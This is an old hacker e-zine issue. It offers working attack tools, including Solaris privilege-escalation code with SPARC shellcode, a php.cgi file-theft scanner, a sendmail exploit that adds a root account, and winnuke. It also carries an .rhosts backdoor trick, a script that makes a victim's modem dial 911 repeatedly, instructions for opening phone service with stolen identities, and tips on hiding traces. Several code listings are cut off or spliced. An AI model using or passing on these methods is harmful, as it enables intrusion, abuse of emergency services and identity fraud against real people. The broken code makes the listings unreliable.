Professional Documents
Culture Documents
0)
Now these past couple of months, elitehackers.com has been getting alot of
newbies to the board.
Some are actually willing to learn, and others are only script-kiddies &
lamers. I have
compiled a little guide that should be able to help the "sprouting-seed
hacker". I hope you
enjoy this and I will probably be making other versions after this.
Do You Know Any Good MP3 sites? I Don't Want To Use Naspter.:
#1 MP3 Source -
http://fs.dai.net/ac/189235/E01.html?http://www.pokeminh.com/mp3
AudioFind - http://www.audiofind.com/
Mp3 Heaven - http://www.mpx-heaven.com/a_g_songs.shtml
In2Mp3.com - http://www.in2mp3.com/archive1.shtml
Now now kiddies, this was just v1.0. Expect more links in the future.
~fú®bÿ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In This HUUUUUUuuuUUUUUGE Issue :
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Hiding From Who (incase you didn't read the pilots): so1o
6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit...............: p1
7. Ident Scanner (ident-scan.c).......................: Dave Goldsmith
8. Windoze NT / 95 Killer : winnuke.c.................: _eci
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Confidence Remains High Issue 002 : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
We have been very busy over the last 50 days, but we still managed to put
together the CodeZero Remote Attack Kit, which contains some very cutting
edge tools as well as some very optimised code, we have included all the
programs precompiled to run from a Linux 2.0.x box, this way you dont even
need a compiler to build this shit =) the source will be available when we
can be bothered to put it on our page, so enjoy this second *FREE* issue of...
One last thing, this issue is a BUMPER WWW hacking issue! because CERT and the
IRT are cool, and they think I live in Sweden :) Heres a disclaimer, just in
case anyone does get a bit annoyed :
***************************************************************************
** NONE OF THE DATA CONTAINED WITHIN THIS FILE IS TO BE USED UNETHICALLY **
** USE THIS DATA AT YOUR OWN RISK AND DON'T COME CRYING TO US IF CERT **
** COME ROUND YOUR HOUSE AND KICK YOUR FUCKING ASS, KILL YOUR PARENTS **
** AND YOUR DOG AND CONFISCATE ALL YOUR SHIT. **
***************************************************************************
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. wh0 the King? : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Okay, heres a rundown of the main groups and associations around the scene on
the efnet at this moment in time, as well as some comments and members...
r00t
====
aleph1
Veggie
tfish
As in, Aleph One of dfw.net and underground.org, Death Veggie of the cDc,
Tweety Fish of the cDc Ninja Strike Force (I also heard he designed the NHC
security) as well as ALOT of others who are very well known in the underground.
r00t are definately the biggest group on the scene, and easily the most
powerful.
el8
===
el8 is another very powerful group, with members that between them make el8 a
force to be feared, members include :
prym
bw-
tsal
The CodeZero
============
I dont really know much of this groups true power, but members include...
Calidor
vertex
vortex
They have many shells traders, and therefore probably alot of influence in the
shells world, as well as experience, quite a large group.
I wont even talk about Undernet groups, seeing they continually split, join
other groups, change names, rip other people code, shit like that, basically
acting like 12 year old warez kiddies (take sIn for example, or maybe even
Psychosis.)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. www.codez.com : fr1day
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
On www.codez.com we will have 40mb of space, this will include the following..
So don't delay! GO THERE TODAY!@# And if you can, please link your sites to
www.codez.com, as we would be very grateful :) Seeing we are basically giving
all this shit to you for PHREE!
phr1day
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Unpatched Solaris 2.3 / 2.4 Exploit : solsuid.c : Shawn Instenes
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/*
If a tty port that is writeable by the user and owned by root is
opened and the I_PUSH "ms" ioctl call made followed by an lseek
the effective uid of the user is changed to root.
*/
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <stropts.h>
#include <sys/stat.h>
#include <sys/conf.h>
main(argc, argv)
int argc;
char* argv[];
{
int fd;
if (argc < 2)
{
fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]);
exit(1);
}
fd = open("/dev/ttyb", O_RDWR);
printf("Your current effective uid is %d\n", geteuid());
ioctl(fd, I_PUSH, "ms");
lseek(fd, 0, 1);
printf("Your effective uid has been changed to %d\n", geteuid());
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Pretty Useful Solaris 2.5.1 Exploit : ban251.c : s0me bugtraq d00d
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0;
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Scan For php Vunerable Servers : phpscan.c : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The next two programs, phpscan.c and phpget.c are fully compiled in the
CodeZero Remote Attack Kit, details about the whole kit in section F, part 2.
These two programs use a hole in the php.cgi code that allows remote users to
read any file on the system that the http daemon has access to.
Vunerable servers I have found include www.2600.com (FreeBSD 2.1), so it does
have some effect, use phpscan.c to scan from a list of hosts, then phpget.c to
retrieve files from the remote hosts.
/*
Usage:
phpscan <infile> <outfile>
*/
#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
int FLAG = 1;
int Call(int signo)
{
FLAG = 0;
}
while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
outsocket = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;
alarm(10);
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. Use php To Get Files : phpget.c : p1
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/etc/passwd
/etc/hosts
/etc/services
/etc/syslogd.conf
/etc/inetd.conf
/*
p1 (peewun@heterosexual.com)
*/
#include <signal.h>
#include <stdio.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <string.h>
FILE *server;
int sock;
hp = gethostbyname(host);
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(80);
sock = socket(AF_INET, SOCK_STREAM, 0);
server=fdopen(sock, "a+");
fprintf(server, "GET /cgi-bin/php.cgi?%s\n",toget);
printf("Output from php.cgi request:\n\n");
while(1){
if (fgets(inbuf, 1024, server) == NULL)
break;
printf(inbuf);
}
}
main(int argc,char **argv)
{
printf("\nThis program retrieves files off a remote system using php.cgi.\n");
printf("Author: p1 - peewun@heterosexual.com\n");
if (argc < 3) {
printf("Usage: %s <domain> <path and file>\n",argv[0]);
printf(" Ex: %s www.p1.com /etc/passwd\n",argv[0]);
}
else {
char *buffer;
(char *)"exit";
do_connect(argv[1],argv[2]);
exit(1);
}
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Hiding From Who : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Okay, bog standard easy shit, works on nearly all systems depending on security
arrangements, I advise you always try this method first when trying to hide.
% cd
% echo "+ +" >> .rhosts
% cd
% echo "+ +" > .rhosts
% telnet machine.host.com
The system is now all set up for you to log in without being seen or logged,
as the + + you echo to the .rhosts file in the users home directory is actually
used so that you can remotely execute commands on the system using rsh, or
login into the system remotely, using rlogin, neither operations require a
password, just a login name, so if the user changes his password, you will
still be able to use this technique, now we can attempt to log into the
system untraced, for this we need to either run linux, or be in a shell,
follow this one, easy step, replace "login" with your login, and host.com
with the EXACT host you want to get into...
eg...
% who
%
w00 w00!! no-one seems to be logged in, and you are therefore hidden!! Now
you can proceed to hack the host without having to worry whos watching you.
Note : Systems Administrators often look over their users directories for
.rhosts files, so be aware of that.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit : p1
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
If modeX would have given us his 884 REMOTE exploit with all the offsets, then
we would have published it, but he didn't, so we ain't :( Have the local version
instead...
#!/bin/bash
clear
echo
echo Sendmail 8.8.4 and 8.8.5 local exploit.
echo Scripting by p1 \(peewun@heterosexual.com\) on 4-15-97.
echo
if [ $1 = "-rm" ]
then
echo Removing /var/tmp/dead.letter
echo
rm -rf /var/tmp/dead.letter
echo Attempting to continue with exploit.
echo
fi
if [ -e /var/tmp/dead.letter ]
then
echo File exists: /var/tmp/dead.letter
echo
echo If you wish to run this exploit, please delete it by running this
echo exploit with the -rm flag.
echo
exit
fi
ln -s /etc/passwd /var/tmp/dead.letter
cat >> unf << _EOF_
helo
mail from: very@bad.address.here
rcpt to: another@bad.bad.address
data
owned::0:0:exploitation:/:/bin/sh
.
_EOF_
cat unf | telnet localhost 25 >> /dev/null
rm -rf unf
echo
echo Please wait for dead.letter to possibly be appended to by sendmail.
echo
sleep 10
if grep exploitation /etc/passwd
then
echo Successful addition of account 'owned' to /etc/passwd, running 'su.'
su owned
else
echo Unsuccessful exploitation of symbolic link bug.
fi
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
7. Ident Scanner : ident-scan.c : Dave Goldsmith
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Very very useful and quick tool, especially if it finds daemons running as root
that shouldn't be...Or even backdoors on high ports.
/*
* ident-scan [v0.15]
* This TCP scanner has the additional functionality of retrieving
* the username that owns the daemon running on the specified port.
* It does this by by attempting to connect to a TCP port, and if it
* succeeds, it will send out an ident request to identd on the
* remote host. I believe this to be a flaw in the design of the
* protocol, and if it is the developers intent to allow 'reverse'
* idents, then it should have been stated clearer in the
* rfc(rfc1413).
*
* USES:
* It can be useful to determine who is running daemons on high ports
* that can be security risks. It can also be used to search for
* misconfigurations such as httpd running as root, other daemons
* running under the wrong uids.
*
* COMPILES: Compiles fine under Linux, BSDI and SunOS 4.1.x.
*
* Dave Goldsmith
* <daveg@escape.com>
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
enum errlist
{
BAD_ARGS,BAD_HOST,NO_IDENT,SOCK_ERR
};
void
usage(error)
enum errlist error;
{
fprintf(stderr,"ident-scan: ");
switch(error)
{
case BAD_ARGS: fprintf(stderr,"usage: ident-scan hostname [low port] [hi port]\n");
break;
case BAD_HOST: fprintf(stderr,"error: cant resolve hostname\n");
break;
case NO_IDENT: fprintf(stderr,"error: ident isnt running on host\n");
break;
case SOCK_ERR: fprintf(stderr,"error: socket() failed\n");
break;
}
exit(-1);
}
struct hostent *
fill_host(machine,host)
char *machine;
struct hostent *host;
{
if ((host=gethostbyname(machine))==NULL)
{
if ((host=gethostbyaddr(machine,4,AF_INET))==NULL)
return(host);
}
return(host);
}
int
main(argc,argv)
int argc;
char **argv;
{
struct sockaddr_in forconnect,forport,forident;
int i,sockfd,identfd,len=sizeof(forport),hiport=9999,loport=1,curport;
struct servent *service;
struct hostent *host;
char identbuf[15], recieved[85], *uid;
if ((argc<2) || (argc>4))
usage(BAD_ARGS);
if (argc>2)
loport=atoi(argv[2]);
if (argc>3)
hiport=atoi(argv[3]);
if ((host=fill_host(argv[1],host))==NULL)
usage(BAD_HOST);
forconnect.sin_family=host->h_addrtype;
forconnect.sin_addr.s_addr=*((long *)host->h_addr);
forident.sin_family=host->h_addrtype;
forident.sin_addr.s_addr=*((long *)host->h_addr);
forident.sin_port=htons(113);
if ((identfd=socket(AF_INET,SOCK_STREAM,0))== -1)
usage(SOCK_ERR);
if ((connect(identfd,(struct sockaddr *)&forident,sizeof(forident)))!=0)
usage(NO_IDENT);
close(identfd);
for(curport=loport;curport<=hiport;curport++)
{
for(i=0;i!=85;i++)
recieved[i]='\0';
forconnect.sin_port=htons(curport);
if ((sockfd=socket(AF_INET,SOCK_STREAM,0))== -1)
usage(SOCK_ERR);
write(identfd,identbuf,strlen(identbuf)+1);
read(identfd,recieved,80);
recieved[strlen(recieved)-1]='\0';
uid=strrchr(recieved,' ');
service=getservbyport(forconnect.sin_port,"tcp");
printf("Port: %3d\tService: %10s\tUserid: %s\n",curport,
(service==NULL)?"(?)":service->s_name,uid);
}
}
}
close(sockfd);
close(identfd);
}
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8. Windoze NT / 95 Killer : winnuke.c : _eci
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
if (argc != 2) {
printf("Usage: %s <target>\n",argv[0]);
exit(0);
}
open_sock(s,argv[1],dport);
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Federal Bugging Frequencies : Weapon-X
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Keep in mind that the federal government can use virtually any
frequency between DC and light. So get scanning now!!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. 911 Autodialler Script : dk
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Okay, scenario...
Your Friend g1mpfuck is on his linux system, you have never really liked him,
and he has gone out to someplave for a few hours, to be back this evening...
If you root his system, and run this, his modem will dial 911 every 10 mins,
but as soon as you do run it, it will kill the pppd and dial the number, so if
he's on IRC, then he will quit... Here it is! Read the instructions in the
code first...
#!/bin/sh
# 911-autodial.sh
#
# for use with linux boxes running DIP.
# dials 911 every ten minutes, and if the user is using pppd
# it kills pppd in order to place the call.
# IMPORTANT!!!
# add this line to root's crontab with: crontab -e root
# 2,12,22,32,42,52 * * * * /path/to/911-autodial.sh
if [ -f /tmp/ppp-dead ]; then
/sbin/dip /tmp/911
rm /tmp/ppp-*
rm /tmp/911.dip
exit 1
fi
kill `ps -ax|grep pppd|grep -v grep|awk 'BEGIN {FS=" ";OFS=" "} {print $1}`
/sbin/dip /tmp/911
rm /tmp/ppp-*
rm /tmp/911.dip
exit 1
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Cellular Calls Without Cloning : TRON
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
There are several ways to make free calls with a cellular phone that does not
have service with the hassle of cloning it, or if you have a phone that can't
be cloned or you don't want to buy the expensive equipment required, so here
are a few ways to do it from home with little risk...
To reach the American Roaming Network (or something like it, depending on
where you are), put your phone on the alternate carrier side so it says roam,
then dial 0 and it should tell you your call is being forwarded.
At that point you should be connected to an automated system, form here you
have a couple of billing options...
To use a credit or calling card, you enter the area code and number you want
to call; for a calling card you then enter the card number and pin, for a
credit card you then enter the card number and expirarion date, then the zip
code of the billing address. ARN takes MasterCard, American Express, and
most local and long distance company calling cards. They say they dont take
VISA anymore, but I've gotten them to work on the automated system.
If the number you call is busy or doesn't answer, you can press * and then
either leave a message that the system will deliver, or try another number.
If you want to dial another number you will have to put the zip code again
after the new number.
You can also make collect and 3rd party billed calls by dialing 0 instead of
the number to call when you connect to ARN. You will be sent to an operator,
tell them you would like to place a call. They will then ask how you would
like to bill it. You can set up a local dialup voice mail box and change
the greeting so it sounds like someone's there to accept the charges, the
operator has to read a script, so you have to adjust the timing to get it
just right.
ARN will not 3rd party or collect bill to 800 numbers, nor will they place
calls to 800 numbers charged to 3rd party numbers.
Another way is to dial 611 and tell the customer support person that you're
having trouble getting through to the area you're trying yo call and could
they try place the call for you. This works about 50% of the time, it helps
to have the name and cell number of someone who has service with that
provider in case they ask for it, they might ask for the social security
number too, so be prepared, dumpster diving at a cell store is the easiest
place to get that info.
The best way, and the one I prefer to cloning, is to get someone else's
information and set up service. The best place to get the information you'll
need is from a place that does credit checks, like a bank or car dealership.
Make sure they have a good rating, like A, B or C, then you wont be asked
for a deposit.
You'll need a name, address, social security number, drivers license number
and work number.
You will also need a cell phone that is not stolen. They will not activate a
stolen phone, when I tried they put me on hold and called the person who's
phone I had and then told me the person wanted me to mail the phone back to
them.
Also find and write down the electronic serial number, you'll need that too.
You then need to call a local cell service provider (ie. GTE MobilNet,
Cellular One, Bell South Mobility, etc.) on a phone you have. Let them tell
you about the different service plans and pick one.
They will then ask for your "information" and ESN. Then they will ask to
call you back with your new cell number, tell them that you're out and
ask for a number to call them back at, they will have no problem with this.
Then call them back and they will tell you how to program your new number
into your phone, they might also tell you how to program in a new system ID
and pagin channel etc, this is no big deal.
Also ask when the billing cycle ends and when the bill is sent out, you will
want to stop using this number when the person you're billing it to gets
their bill.
Be sure to get call features like 3-way and call forwarding, they're always
useful to have.
I prefer this to cloning because its less worry and hassle and it lasts up
to a month.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Getting Your Exploits Onto Systems : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
You want to get files or exploits onto another system, you can do this the
following few ways...
This method is simple, easy to do, pretty undetectable, but sometimes may be
a touch too slow, depending on the location / speed of the system...just mail
login@host.com the file or whatever, then wait at the other side for them to
get it.
Using an FTP client, you can FTP to the remote server from your system, then
upload the files to the server, but you will most probably get logged, and so
if your exploits fail, this may not be such a good idea...
This is easy to do, pretty quick and effective, follow these steps...
main()
{
printf("Quit Laughin' At Yerself Yew Gimp :P\n"):
}
STOP
FearFactory:~:$ cat heh.c
#include <stdio.h>
main()
{
printf("Quit Laughin' At Yerself Yew Gimp :P\n"):
}
FearFactory:~:$ cc -o heh heh.c
FearFactory:~:$ heh
Quit Laughin' At Yerself Yew Gimp :P
FearFactory:~:$
I used "cat > filename.c << STOP" to input the file from the terminal, I could
have cut a file from another editor, then just pasted it to the terminal, then
when I type "STOP" and hit enter, cat stops taking input from the terminal and
EOF's the file...Then I cat it again, to prove that the STOP does not stay as
part of the file, then I proceed to compile the source using cc and then I run
the program, easy =)
Always remember to remove traces of exploits from the system if you fail, as
this is messy and could lead to the admin becoming suspicious, just keep your
technique clean, and you will learn some good skills...
Recommended Reading :
---------------------
ISBN 1-56592-167-4
UK : œ14.99
US : $19.95
CAN : $28.95
I really like this book, its very easy to use, pretty compact, and 424 pages
long, the information in it will boost your skills by a long way if you are
a newbie, and there are alot of more advanced features, such as debugfs and
many other programs and their syntax. Basically its a dictionary of Linux
commands, along with a short explanation, the syntax for the command and
many examples, I have the first printing, which is January 1997, so this book
is not old at all, and pretty up-to-date...
